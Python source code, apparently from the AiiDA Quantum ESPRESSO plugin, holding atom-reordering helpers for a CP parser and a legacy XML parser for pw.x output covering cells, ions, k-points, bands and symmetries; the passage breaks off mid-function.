del out_dict['ions_positions_force']
except KeyError:
pass
# convert the dictionary into an AiiDA object
output_params = Dict(dict=out_dict)
self.out('output_parameters', output_params)
def get_linkname_trajectory(self):
"""Returns the name of the link to the output_structure (None if not present)"""
return 'output_trajectory'
def _generate_sites_ordering(self, raw_species, raw_atoms):
"""take the positions of xml and from file.pos of the LAST step and compare them."""
# Examples in the comments are for species [Ba, O, Ti]
# and atoms [Ba, Ti, O, O, O]
# Dictionary to associate the species name to the idx
# Example: {'Ba': 1, 'O': 2, 'Ti': 3}
species_dict = {name: idx for idx, name in zip(raw_species['index'], raw_species['type'])}
# List of the indices of the specie associated to each atom,
# in the order specified in input
# Example: (1,3,2,2,2)
atoms_species_idx = [species_dict[a[0]] for a in raw_atoms]
# I also attach the current position; important to convert to a list
# Otherwise the iterator can be looped on only once!
# Example: ((0,1),(1,3),(2,2),(3,2),(4,2))
ref_atom_list = list(enumerate(atoms_species_idx))
new_order_tmp = []
# I reorder the atoms, first by specie, then in their order
# This is the order used in output by CP!!
# Example: ((0,1),(2,2),(3,2),(4,2),(1,3))
for specie_idx in sorted(raw_species['index']):
for elem in ref_atom_list:
if elem[1] == specie_idx:
new_order_tmp.append(elem)
# This is the new order that is printed in CP:
# e.g. reordering[2] is the index of the atom, in the input
# list of atoms, that is printed in position 2 (0-based, so the
# third atom) in the CP output files.
# Example: [0,2,3,4,1]
reordering = [_[0] for _ in new_order_tmp]
# I now need the inverse reordering, to put back in place
# from the output ordering to the input one!
# Example: [0,4,1,2,3]
# Because in the final list (Ba, O, O, O, Ti)
# the first atom Ba in the input is atom 0 in the CP output (the first),
# the second atom Ti in the input is atom 4 (the fifth) in the CP output,
# and so on
sorted_indexed_reordering = sorted([(_[1], _[0]) for _ in enumerate(reordering)])
reordering_inverse = [_[1] for _ in sorted_indexed_reordering]
return reordering_inverse
def _get_reordered_list(self, origlist, reordering):
"""Given a list to reorder, a list of integer positions with the new order, return the reordered list."""
return [origlist[e] for e in reordering]
def _get_reordered_array(self, _input, reordering):
return numpy.array([self._get_reordered_list(i, reordering) for i in _input])
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Code that was written to parse the legacy XML format of Quantum ESPRESSO, which was deprecated in version 6.4."""
import os
import string
from xml.dom.minidom import parse, parseString, Element
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.utils.mapping import get_logging_container
from qe_tools import CONSTANTS
units_suffix = '_units'
default_energy_units = 'eV'
default_k_points_units = '1 / angstrom'
default_length_units = 'Angstrom'
def parse_pw_xml_pre_6_2(xml_file, dir_with_bands):
"""Parse the content of XML output file written by `pw.x` with the old schema-less XML format.
:param xml_file: filelike object to the XML output file
:param dir_with_bands: absolute filepath to directory containing k-point XML files
:returns: tuple of two dictionaries, with the parsed data and log messages, respectively
"""
import copy
from xml.parsers.expat import ExpatError
logs = get_logging_container()
# NOTE : I often assume that if the xml file has been written, it has no internal errors.
try:
dom = parse(xml_file)
except ExpatError:
logs.error.append('Error in XML parseString: bad format')
parsed = {
'bands': {},
'structure': {},
}
return parsed, logs
parsed_data = {}
structure_dict = {}
# CARD CELL
structure_dict, lattice_vectors, volume = copy.deepcopy(xml_card_cell(structure_dict, dom))
# CARD IONS
structure_dict = copy.deepcopy(xml_card_ions(structure_dict, dom, lattice_vectors, volume))
#CARD HEADER
parsed_data = copy.deepcopy(xml_card_header(parsed_data, dom))
# CARD CONTROL
cardname = 'CONTROL'
target_tags = read_xml_card(dom, cardname)
for tagname in ['PP_CHECK_FLAG', 'LKPOINT_DIR', 'Q_REAL_SPACE', 'BETA_REAL_SPACE']:
parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
# TODO: why this one isn't working? What is it actually?
# # CARD MOVING_CELL
#
# try:
# target_tags = dom.getElementsByTagName('MOVING_CELL')[0]
# except:
# raise IOError
#
# tagname='CELL_FACTOR'
# parsed_data[tagname.lower()]=parse_xml_child_float(tagname,target_tags)
# CARD ELECTRIC_FIELD
cardname = 'ELECTRIC_FIELD'
target_tags = read_xml_card(dom, cardname)
for tagname in ['HAS_ELECTRIC_FIELD', 'HAS_DIPOLE_CORRECTION']:
parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
if parsed_data['has_electric_field'] or parsed_data['has_dipole_correction']:
tagname = 'FIELD_DIRECTION'
parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
for tagname in ['MAXIMUM_POSITION', 'INVERSE_REGION', 'FIELD_AMPLITUDE']:
parsed_data[tagname.lower()] = parse_xml_child_float(tagname, target_tags)
# CARD PLANE_WAVES
parsed_data = copy.deepcopy(xml_card_planewaves(parsed_data, dom, 'pw'))
# CARD SPIN
parsed_data = copy.deepcopy(xml_card_spin(parsed_data, dom))
# CARD BRILLOUIN ZONE
cardname = 'BRILLOUIN_ZONE'
target_tags = read_xml_card(dom, cardname)
tagname = 'NUMBER_OF_K-POINTS'
parsed_data[tagname.replace('-', '_').lower()] = parse_xml_child_integer(tagname, target_tags)
tagname = 'UNITS_FOR_K-POINTS'
attrname = 'UNITS'
metric = parse_xml_child_attribute_str(tagname, attrname, target_tags)
if metric not in ['2 pi / a']:
raise QEOutputParsingError('Error parsing attribute {},'.format(attrname) + \
' tag {} inside {}, units unknown'.format(tagname, target_tags.tagName) )
k_points_units = metric
for tagname, param in [['MONKHORST_PACK_GRID', 'nk'], ['MONKHORST_PACK_OFFSET', 'k']]:
try:
#a = target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
value = [int(a.getAttribute(param + str(i + 1))) for i in range(3)]
parsed_data[tagname.replace('-', '_').lower()] = value
except Exception: # I might not use the monkhorst pack grid
pass
kpoints = []
kpoints_weights = []
tagname_prefix = 'K-POINT.'
a_dict = {_.nodeName: _ for _ in target_tags.childNodes if _.nodeName.startswith(tagname_prefix)}
try:
import numpy
for i in range(parsed_data['number_of_k_points']):
tagname = '{}{}'.format(tagname_prefix, i + 1)
#a = target_tags.getElementsByTagName(tagname)[0]
a = a_dict[tagname]
b = a.getAttribute('XYZ').replace('\n', '').rsplit()
value = [float(s) for s in b]
metric = k_points_units
if metric == '2 pi / a':
value = [2. * numpy.pi * float(s) / structure_dict['lattice_parameter'] for s in value]
weight = float(a.getAttribute('WEIGHT'))
kpoints.append(value)
kpoints_weights.append(weight)
parsed_data['k_points'] = kpoints
parsed_data['k_points' + units_suffix] = default_k_points_units
parsed_data['k_points_weights'] = kpoints_weights
except Exception:
raise QEOutputParsingError('Error parsing tag K-POINT.{} inside {}.'.format(i + 1, target_tags.tagName))
# I skip this card until someone will have a need for this.
# try:
# tagname='STARTING_K-POINTS'
# num_starting_k_points=parse_xml_child_integer(tagname,target_tags)
# # raise exception if there is no such a key
# parsed_data[tagname.replace('-','_').lower()]=num_starting_k_points
#
# if parsed_data.get('starting_k_points'):
# try:
# kpoints=[]
# for i in range(parsed_data['starting_k_points']):
# tagname='K-POINT_START.'+str(i+1)
# a=target_tags.getElementsByTagName(tagname)[0]
# b=a.getAttribute('XYZ').replace('\n','').rsplit()
# value=[ float(s) for s in b ]
# metric=parsed_data['k_points_units']
# if metric=='2 pi / a':
# value=[ float(s)/parsed_data['lattice_parameter'] for s in value ]
#
# weight=float(a.getAttribute('WEIGHT'))
#
# kpoints.append([value,weight])
#
# parsed_data['k_point_start']=kpoints
# except Exception:
# raise QEOutputParsingError('Error parsing tag {}'.format(tagname)+\
# ' inside {}.'.format(target_tags.tagName ) )
# except Exception:
# if not parsed_data.get('starting_k_points'):
# pass
# else:
# parsed_data['xml_warnings'].append("Warning: could not parse {}".format(tagname))
# tagname='NORM-OF-Q'
# TODO: decide if save this parameter
# parsed_data[tagname.replace('-','_').lower()]=parse_xml_child_float(tagname,target_tags)
# CARD BAND STRUCTURE INFO
cardname = 'BAND_STRUCTURE_INFO'
target_tags = read_xml_card(dom, cardname)
for tagname in ['NUMBER_OF_SPIN_COMPONENTS', 'NUMBER_OF_ATOMIC_WFC', 'NUMBER_OF_BANDS']:
parsed_data[tagname.replace('-','_').lower()] = \
parse_xml_child_integer(tagname,target_tags)
tagname = 'NON-COLINEAR_CALCULATION'
parsed_data[tagname.replace('-','_').lower()] = \
parse_xml_child_bool(tagname,target_tags)
tagname = 'NUMBER_OF_ELECTRONS'
parsed_data[tagname.replace('-','_').lower()] = \
parse_xml_child_float(tagname,target_tags)
tagname = 'UNITS_FOR_ENERGIES'
attrname = 'UNITS'
units = parse_xml_child_attribute_str(tagname, attrname, target_tags)
if units not in ['hartree']:
raise QEOutputParsingError(
'Expected energy units in Hartree. Got instead {}'.format(parsed_data['energy_units'])
)
try:
tagname = 'TWO_FERMI_ENERGIES'
parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
except Exception:
pass
if parsed_data.get('two_fermi_energies', False):
tagname = 'FERMI_ENERGY_UP'
parsed_data[tagname.replace('-','_').lower()] = \
parse_xml_child_float(tagname,target_tags) * CONSTANTS.hartree_to_ev
parsed_data[tagname.lower() + units_suffix] = default_energy_units
tagname = 'FERMI_ENERGY_DOWN'
parsed_data[tagname.replace('-','_').lower()] = \
parse_xml_child_float(tagname,target_tags) * CONSTANTS.hartree_to_ev
parsed_data[tagname.lower() + units_suffix] = default_energy_units
else:
tagname = 'FERMI_ENERGY'
parsed_data[tagname.replace('-','_').lower()] = \
parse_xml_child_float(tagname,target_tags) * CONSTANTS.hartree_to_ev
parsed_data[tagname.lower() + units_suffix] = default_energy_units
#CARD MAGNETIZATION_INIT
cardname = 'MAGNETIZATION_INIT'
target_tags = read_xml_card(dom, cardname)
# 0 if false
tagname = 'CONSTRAINT_MAG'
parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
vec1 = []
vec2 = []
vec3 = []
for i in range(structure_dict['number_of_species']):
tagname = 'SPECIE.' + str(i + 1)
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
tagname2 = 'STARTING_MAGNETIZATION'
vec1.append(parse_xml_child_float(tagname2, a))
tagname2 = 'ANGLE1'
vec2.append(parse_xml_child_float(tagname2, a))
tagname2 = 'ANGLE2'
vec3.append(parse_xml_child_float(tagname2, a))
parsed_data['starting_magnetization'] = vec1
parsed_data['magnetization_angle1'] = vec2
parsed_data['magnetization_angle2'] = vec3
#CARD OCCUPATIONS
cardname = 'OCCUPATIONS'
target_tags = read_xml_card(dom, cardname)
for tagname in ['SMEARING_METHOD', 'TETRAHEDRON_METHOD', 'FIXED_OCCUPATIONS']:
parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
if parsed_data['smearing_method']:
parsed_data['occupations'] = 'smearing'
elif parsed_data['tetrahedron_method']:
parsed_data['occupations'] = 'tetrahedra' # TODO: might also be tetrahedra_lin or tetrahedra_opt: check input?
elif parsed_data['fixed_occupations']:
parsed_data['occupations'] = 'fixed'
# Remove the following deprecated keys
for tagname in ['SMEARING_METHOD', 'TETRAHEDRON_METHOD', 'FIXED_OCCUPATIONS']:
parsed_data.pop(tagname.lower())
#CARD CHARGE-DENSITY
cardname = 'CHARGE-DENSITY'
target_tags = read_xml_card(dom, cardname)
try:
attrname = 'iotk_link'
value = str(target_tags.getAttribute(attrname)).rstrip().replace('\n', '').lower()
parsed_data[cardname.lower().rstrip().replace('-', '_')] = value
except Exception:
raise QEOutputParsingError('Error parsing attribute {},'.format(attrname) + \
' card {}.'.format(cardname))
#CARD EIGENVALUES
# Note: if this card is parsed, the dimension of the database grows very much!
cardname = 'EIGENVALUES'
target_tags = read_xml_card(dom, cardname)
bands_dict = {}
if dir_with_bands:
try:
occupations1 = []
occupations2 = []
bands1 = []
bands2 = []
for i in range(parsed_data['number_of_k_points']):
tagname = 'K-POINT.' + str(i + 1)
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
def read_bands_and_occupations(eigenval_n):
# load the eigenval.xml file
with open(eigenval_n, 'r') as eigenval_f:
f = eigenval_f.read()
eig_dom = parseString(f)
tagname = 'UNITS_FOR_ENERGIES'
a = eig_dom.getElementsByTagName(tagname)[0]
attrname = 'UNITS'
metric = str(a.getAttribute(attrname))
if metric not in ['Hartree']:
raise QEOutputParsingError('Error parsing eigenvalues xml file, ' + \
'units {} not implemented.'.format(metric))
tagname = 'EIGENVALUES'
a = eig_dom.getElementsByTagName(tagname)[0]
b = a.childNodes[0]
value_e = [float(s) * CONSTANTS.hartree_to_ev for s in b.data.split()]
tagname = 'OCCUPATIONS'
a = eig_dom.getElementsByTagName(tagname)[0]
b = a.childNodes[0]
value_o = [float(s) for s in b.data.split()]
return value_e, value_o
# two cases: in cases of magnetic calculations, I have both spins
try:
tagname2 = 'DATAFILE'
b = a.getElementsByTagName(tagname2)[0]
attrname = 'iotk_link'
value = str(b.getAttribute(attrname)).rstrip().replace('\n', '')
eigenval_n = os.path.join(dir_with_bands, value)
value_e, value_o = read_bands_and_occupations(eigenval_n)
bands1.append(value_e)
occupations1.append(value_o)
except IndexError:
tagname2 = 'DATAFILE.1'
b1 = a.getElementsByTagName(tagname2)[0]
tagname2 = 'DATAFILE.2'
b2 = a.getElementsByTagName(tagname2)[0]
attrname = 'iotk_link'
value1 = str(b1.getAttribute(attrname)).rstrip().replace('\n', '')
value2 = str(b2.getAttribute(attrname)).rstrip().replace('\n', '')
eigenval_n = os.path.join(dir_with_bands, value1)
value_e, value_o = read_bands_and_occupations(eigenval_n)
bands1.append(value_e)
occupations1.append(value_o)
eigenval_n = os.path.join(dir_with_bands, value2)
value_e, value_o = read_bands_and_occupations(eigenval_n)
bands2.append(value_e)
occupations2.append(value_o)
occupations = [occupations1]
bands = [bands1]
if occupations2:
occupations.append(occupations2)
if bands2:
bands.append(bands2)
bands_dict['occupations'] = occupations
bands_dict['bands'] = bands
bands_dict['bands' + units_suffix] = default_energy_units
except Exception as exception:
raise QEOutputParsingError(
'Error parsing card {}: {} {}'.format(tagname, exception.__class__.__name__, exception)
)
# if dir_with_bands:
# # if there is at least an empty band:
# if parsed_data['smearing_method'] or \
# parsed_data['number_of_electrons']/2. < parsed_data['number_of_bands']:
#
# #TODO: currently I do it only for non magnetic systems
# if len(bands_dict['occupations'])==1:
# # initialize lumo
# lumo = parsed_data['homo']+10000.0
# for list_bands in bands_dict['bands']:
# for value in list_bands:
# if (value > parsed_data['fermi_energy']) and (value<lumo):
# lumo=value
# if (lumo==parsed_data['homo']+10000.0) or lumo<=parsed_data['fermi_energy']:
# #might be an error for bandgap larger than 10000 eV...
# raise QEOutputParsingError('Error while searching for LUMO.')
# parsed_data['lumo']=lumo
# parsed_data['lumo'+units_suffix] = default_energy_units
# CARD symmetries
parsed_data = copy.deepcopy(xml_card_symmetries(parsed_data, dom))
# CARD EXCHANGE_CORRELATION
parsed_data = copy.deepcopy(xml_card_exchangecorrelation(parsed_data, dom))
parsed_data['bands'] = bands_dict
parsed_data['structure'] = structure_dict
return parsed_data, logs
def cell_volume(a1, a2, a3):
r"""
returns the volume of the primitive cell: :math:`|\vec a_1\cdot(\vec a_2\cross \vec a_3)|`
"""
a_mid_0 = a2[1] * a3[2] - a2[2] * a3[1]
a_mid_1 = a2[2] * a3[0] - a2[0] * a3[2]
a_mid_2 = a2[0] * a3[1] - a2[1] * a3[0]
return abs(float(a1[0] * a_mid_0 + a1[1] * a_mid_1 + a1[2] * a_mid_2))
# In the following, some functions that helps the parsing of
# the xml file of QE v5.0.x (version below not tested)
def read_xml_card(dom, cardname):
try:
root_node = [_ for _ in dom.childNodes if isinstance(_, Element) and _.nodeName == 'Root'][0]
the_card = [_ for _ in root_node.childNodes if _.nodeName == cardname][0]
#the_card = dom.getElementsByTagName(cardname)[0]
return the_card
except Exception as e:
print(e)
raise QEOutputParsingError('Error parsing tag {}'.format(cardname))
def parse_xml_child_integer(tagname, target_tags):
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
return int(b.data)
except Exception:
raise QEOutputParsingError('Error parsing tag {} inside {}'.format(tagname, target_tags.tagName))
def parse_xml_child_float(tagname, target_tags):
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
return float(b.data)
except Exception:
raise QEOutputParsingError('Error parsing tag {} inside {}'\
.format(tagname, target_tags.tagName ) )
def parse_xml_child_bool(tagname, target_tags):
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
return str2bool(b.data)
except Exception:
raise QEOutputParsingError('Error parsing tag {} inside {}'\
.format(tagname, target_tags.tagName) )
def str2bool(string):
try:
false_items = ['f', '0', 'false', 'no']
true_items = ['t', '1', 'true', 'yes']
string = str(string.lower().strip())
if string in false_items:
return False
if string in true_items:
return True
else:
raise QEOutputParsingError('Error converting string {} to boolean value.'.format(string))
except Exception:
raise QEOutputParsingError('Error converting string to boolean.')
def parse_xml_child_str(tagname, target_tags):
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
return str(b.data).rstrip().replace('\n', '')
except Exception:
raise QEOutputParsingError('Error parsing tag {} inside {}'\
.format(tagname, target_tags.tagName) )
def parse_xml_child_attribute_str(tagname, attributename, target_tags):
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
value = str(a.getAttribute(attributename))
return value.rstrip().replace('\n', '').lower()
except Exception:
raise QEOutputParsingError(
'Error parsing attribute {}, tag {} inside {}'.format(attributename, tagname, target_tags.tagName)
)
def parse_xml_child_attribute_int(tagname, attributename, target_tags):
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
value = int(a.getAttribute(attributename))
return value
except Exception:
raise QEOutputParsingError(
'Error parsing attribute {}, tag {} inside {}'.format(attributename, tagname, target_tags.tagName)
)
def convert_list_to_matrix(in_matrix, n_rows, n_columns):
"""converts a list into a list of lists (a matrix like) with n_rows and n_columns."""
return [in_matrix[j:j + n_rows] for j in range(0, n_rows * n_columns, n_rows)]
def xml_card_cell(parsed_data, dom):
#CARD CELL of QE output
cardname = 'CELL'
target_tags = read_xml_card(dom, cardname)
for tagname in ['NON-PERIODIC_CELL_CORRECTION', 'BRAVAIS_LATTICE']:
parsed_data[tagname.replace('-', '_').lower()] = parse_xml_child_str(tagname, target_tags)
tagname = 'LATTICE_PARAMETER'
value = parse_xml_child_float(tagname, target_tags)
parsed_data[tagname.replace('-', '_').lower() + '_xml'] = value
attrname = 'UNITS'
metric = parse_xml_child_attribute_str(tagname, attrname, target_tags)
if metric not in ['bohr', 'angstrom']:
raise QEOutputParsingError(
'Error parsing attribute {}, tag {} inside {}, units not found'.format(
attrname, tagname, target_tags.tagName
)
)
if metric == 'bohr':
value *= CONSTANTS.bohr_to_ang
parsed_data[tagname.replace('-', '_').lower()] = value
tagname = 'CELL_DIMENSIONS'
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
c = b.data.replace('\n', '').split()
value = [float(i) for i in c]
parsed_data[tagname.replace('-', '_').lower()] = value
except Exception:
raise QEOutputParsingError('Error parsing tag {} inside {}.'.format(tagname, target_tags.tagName))
tagname = 'DIRECT_LATTICE_VECTORS'
lattice_vectors = []
try:
second_tagname = 'UNITS_FOR_DIRECT_LATTICE_VECTORS'
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.getElementsByTagName('UNITS_FOR_DIRECT_LATTICE_VECTORS')[0]
value = str(b.getAttribute('UNITS')).lower()
parsed_data[second_tagname.replace('-', '_').lower()] = value
metric = value
if metric not in ['bohr', 'angstroms']: # REMEMBER TO CHECK THE UNITS AT THE END OF THE FUNCTION
raise QEOutputParsingError(
'Error parsing tag {} inside {}: units not supported: {}'.format(tagname, target_tags.tagName, metric)
)
lattice_vectors = []
for second_tagname in ['a1', 'a2', 'a3']:
#b = a.getElementsByTagName(second_tagname)[0]
b = [_ for _ in a.childNodes if _.nodeName == second_tagname][0]
c = b.childNodes[0]
d = c.data.replace('\n', '').split()
value = [float(i) for i in d]
if metric == 'bohr':
value = [CONSTANTS.bohr_to_ang * float(s) for s in value]
lattice_vectors.append(value)
volume = cell_volume(lattice_vectors[0], lattice_vectors[1], lattice_vectors[2])
except Exception:
raise QEOutputParsingError(
'Error parsing tag {} inside {} inside {}.'.format(tagname, target_tags.tagName, cardname)
)
# NOTE: lattice_vectors will be saved later together with card IONS.atom
tagname = 'RECIPROCAL_LATTICE_VECTORS'
try:
#a = target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
second_tagname = 'UNITS_FOR_RECIPROCAL_LATTICE_VECTORS'
b = a.getElementsByTagName(second_tagname)[0]
value = str(b.getAttribute('UNITS')).lower()
parsed_data[second_tagname.replace('-', '_').lower()] = value
metric = value
# NOTE: output is given in 2 pi / a [ang ^ -1]
if metric not in ['2 pi / a']:
raise QEOutputParsingError(
'Error parsing tag {} inside {}: units {} not supported'.format(tagname, target_tags.tagName, metric)
)
# reciprocal_lattice_vectors
this_matrix = []
for second_tagname in ['b1', 'b2', 'b3']:
b = a.getElementsByTagName(second_tagname)[0]
c = b.childNodes[0]
d = c.data.replace('\n', '').split()
value = [float(i) for i in d]
if metric == '2 pi / a':
value = [float(s) / parsed_data['lattice_parameter'] for s in value]
this_matrix.append(value)
parsed_data['reciprocal_lattice_vectors'] = this_matrix
except Exception:
raise QEOutputParsingError('Error parsing tag {} inside {}.'.format(tagname, target_tags.tagName))
return parsed_data, lattice_vectors, volume
def xml_card_ions(parsed_data, dom, lattice_vectors, volume):
cardname = 'IONS'
target_tags = read_xml_card(dom, cardname)
for tagname in ['NUMBER_OF_ATOMS', 'NUMBER_OF_SPECIES']:
parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
tagname = 'UNITS_FOR_ATOMIC_MASSES'
attrname = 'UNITS'
parsed_data[tagname.lower()] = parse_xml_child_attribute_str(tagname, attrname, target_tags)
try:
parsed_data['species'] = {}
parsed_data['species']['index'] = []
parsed_data['species']['type'] = []
parsed_data['species']['mass'] = []
parsed_data['species']['pseudo'] = []
for i in range(parsed_data['number_of_species']):
tagname = 'SPECIE.' + str(i + 1)
parsed_data['species']['index'].append(i + 1)
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
tagname2 = 'ATOM_TYPE'
parsed_data['species']['type'].append(parse_xml_child_str(tagname2, a))
tagname2 = 'MASS'
parsed_data['species']['mass'].append(parse_xml_child_float(tagname2, a))
tagname2 = 'PSEUDO'
parsed_data['species']['pseudo'].append(parse_xml_child_str(tagname2, a))
tagname = 'UNITS_FOR_ATOMIC_POSITIONS'
attrname = 'UNITS'
parsed_data[tagname.lower()] = parse_xml_child_attribute_str(tagname, attrname, target_tags)
except:
raise QEOutputParsingError('Error parsing tag SPECIE.# inside %s.' % (target_tags.tagName))
# TODO convert the units
# if parsed_data['units_for_atomic_positions'] not in ['alat','bohr','angstrom']:
try:
atomlist = []
atoms_index_list = []
atoms_if_pos_list = []
tagslist = []
for i in range(parsed_data['number_of_atoms']):
tagname = 'ATOM.' + str(i + 1)
# USELESS AT THE MOMENT, I DON'T SAVE IT
# parsed_data['atoms']['list_index']=i
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
tagname2 = 'INDEX'
b = int(a.getAttribute(tagname2))
atoms_index_list.append(b)
tagname2 = 'SPECIES'
chem_symbol = str(a.getAttribute(tagname2)).rstrip().replace('\n', '')
# I check if it is a subspecie
chem_symbol_digits = ''.join([i for i in chem_symbol if i in string.digits])
try:
tagslist.append(int(chem_symbol_digits))
except ValueError:
# If I can't parse the digit, it is probably not there: I add a None to the tagslist
tagslist.append(None)
# I remove the symbols
chem_symbol = ''.join(i for i in chem_symbol if not i.isdigit())
tagname2 = 'tau'
b = a.getAttribute(tagname2)
tau = [float(s) for s in b.rstrip().replace('\n', '').split()]
metric = parsed_data['units_for_atomic_positions']
if metric not in ['alat', 'bohr', 'angstrom']: # REMEMBER TO CONVERT AT THE END
raise QEOutputParsingError('Error parsing tag %s inside %s' % (tagname, target_tags.tagName))
if metric == 'alat':
tau = [parsed_data['lattice_parameter_xml'] * float(s) for s in tau]
elif metric == 'bohr':
tau = [CONSTANTS.bohr_to_ang * float(s) for s in tau]
atomlist.append([chem_symbol, tau])
tagname2 = 'if_pos'
b = a.getAttribute(tagname2)
if_pos = [int(s) for s in b.rstrip().replace('\n', '').split()]
atoms_if_pos_list.append(if_pos)
parsed_data['atoms'] = atomlist
parsed_data['atoms_index_list'] = atoms_index_list
parsed_data['atoms_if_pos_list'] = atoms_if_pos_list
cell = {}
cell['lattice_vectors'] = lattice_vectors
cell['volume'] = volume
cell['atoms'] = atomlist
cell['tagslist'] = tagslist
parsed_data['cell'] = cell
except Exception:
raise QEOutputParsingError('Error parsing tag ATOM.# inside %s.' % (target_tags.tagName))
# saving data together with cell parameters. Did so for better compatibility with ASE.
# correct some units that have been converted in
parsed_data['atomic_positions' + units_suffix] = default_length_units
parsed_data['direct_lattice_vectors' + units_suffix] = default_length_units
return parsed_data
def xml_card_spin(parsed_data, dom):
cardname = 'SPIN'
target_tags = read_xml_card(dom, cardname)
for tagname in ['LSDA', 'NON-COLINEAR_CALCULATION', 'SPIN-ORBIT_CALCULATION', 'SPIN-ORBIT_DOMAG']:
parsed_data[tagname.replace('-', '_').lower()] = parse_xml_child_bool(tagname, target_tags)
return parsed_data
def xml_card_header(parsed_data, dom):
cardname = 'HEADER'
target_tags = read_xml_card(dom, cardname)
for tagname in ['FORMAT', 'CREATOR']:
for attrname in ['NAME', 'VERSION']:
parsed_data[(tagname + '_' + attrname).lower()
] = parse_xml_child_attribute_str(tagname, attrname, target_tags)
return parsed_data
def xml_card_planewaves(parsed_data, dom, calctype):
if calctype not in ['pw', 'cp']:
raise ValueError("Input flag not accepted, must be 'cp' or 'pw'")
cardname = 'PLANE_WAVES'
target_tags = read_xml_card(dom, cardname)
tagname = 'UNITS_FOR_CUTOFF'
attrname = 'UNITS'
units = parse_xml_child_attribute_str(tagname, attrname, target_tags).lower()
if 'hartree' not in units:
if 'rydberg' not in units:
raise QEOutputParsingError('Units {} are not supported by parser'.format(units))
else:
if 'hartree' in units:
conv_fac = CONSTANTS.hartree_to_ev
else:
conv_fac = CONSTANTS.ry_to_ev
tagname = 'WFC_CUTOFF'
parsed_data[tagname.lower()] = parse_xml_child_float(tagname, target_tags) * conv_fac
parsed_data[tagname.lower() + units_suffix] = default_energy_units
tagname = 'RHO_CUTOFF'
parsed_data[tagname.lower()] = parse_xml_child_float(tagname, target_tags) * conv_fac
parsed_data[tagname.lower() + units_suffix] = default_energy_units
for tagname in ['FFT_GRID', 'SMOOTH_FFT_GRID']:
grid = []
for attrname in ['nr1', 'nr2', 'nr3']:
if 'SMOOTH' in tagname:
attrname += 's'
grid.append(parse_xml_child_attribute_int(tagname, attrname, target_tags))
parsed_data[tagname.lower()] = grid
if calctype == 'cp':
for tagname in ['MAX_NUMBER_OF_GK-VECTORS', 'GVECT_NUMBER', 'SMOOTH_GVECT_NUMBER']:
parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
tagname = 'GAMMA_ONLY'
parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
tagname = 'SMALLBOX_FFT_GRID'
fft_grid = []
for attrname in ['nr1b', 'nr2b', 'nr3b']:
fft_grid.append(parse_xml_child_attribute_int(tagname, attrname, target_tags))
parsed_data[tagname.lower()] = fft_grid
return parsed_data
def xml_card_symmetries(parsed_data, dom):
cardname = 'SYMMETRIES'
target_tags = read_xml_card(dom, cardname)
for tagname in ['NUMBER_OF_SYMMETRIES', 'NUMBER_OF_BRAVAIS_SYMMETRIES']:
parsed_data[tagname.replace('-','_').lower()] = \
parse_xml_child_integer(tagname,target_tags)
for tagname in ['INVERSION_SYMMETRY', 'DO_NOT_USE_TIME_REVERSAL', 'TIME_REVERSAL_FLAG', 'NO_TIME_REV_OPERATIONS']:
parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
tagname = 'UNITS_FOR_SYMMETRIES'
attrname = 'UNITS'
metric = parse_xml_child_attribute_str(tagname, attrname, target_tags)
if metric not in ['crystal']:
raise QEOutputParsingError('Error parsing attribute {},'.format(attrname) + \
' tag {} inside '.format(tagname) + \
'{}, units unknown'.format(target_tags.tagName ) )
parsed_data['symmetries' + units_suffix] = metric
# parse the symmetry matrices
parsed_data['symmetries'] = []
find_sym = True
i = 0
while find_sym:
try:
i += 1
current_sym = {}
tagname = 'SYMM.' + str(i)
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
tagname2 = 'INFO'
b = a.getElementsByTagName(tagname2)[0]
attrname = 'NAME'
value = str(b.getAttribute(attrname)).rstrip().replace('\n', '')
current_sym['name'] = value
try:
attrname = 'T_REV'
value = str(b.getAttribute(attrname)).rstrip().replace('\n', '')
current_sym[attrname.lower()] = value
except Exception:
pass
tagname2 = 'ROTATION'
b = a.getElementsByTagName(tagname2)[0]
c = [int(s) for s in b.childNodes[0].data.split()]
current_sym[tagname2.lower()] = convert_list_to_matrix(c, 3, 3)
